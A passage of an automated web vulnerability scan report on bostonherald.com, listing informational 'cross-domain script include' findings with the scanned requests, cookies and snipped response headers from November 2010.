http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:48:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.112. http://bostonherald.com/news/opinion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/opinion/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:30:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.113. http://bostonherald.com/news/opinion/editorials/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/editorials/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.114. http://bostonherald.com/news/opinion/editorials/view/20101107knee-jerk_reaction/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/editorials/view/20101107knee-jerk_reaction/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/opinion/editorials/view/20101107knee-jerk_reaction/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:32:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.115. http://bostonherald.com/news/opinion/op_ed/view/20101107after_midterms_all_is_right/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/op_ed/view/20101107after_midterms_all_is_right/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/opinion/op_ed/view/20101107after_midterms_all_is_right/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:30:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.116. http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:30:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.117. http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:30:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.118. http://bostonherald.com/news/opinion/op_ed/view/20101107gop_wave_misses_liberal_enclaves/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/op_ed/view/20101107gop_wave_misses_liberal_enclaves/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/opinion/op_ed/view/20101107gop_wave_misses_liberal_enclaves/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:31:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.119. http://bostonherald.com/news/police_logs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/police_logs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/police_logs/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:59:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.120. http://bostonherald.com/news/police_logs/view/20101027dont_rock_the_boat_or_break_into_it_either/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
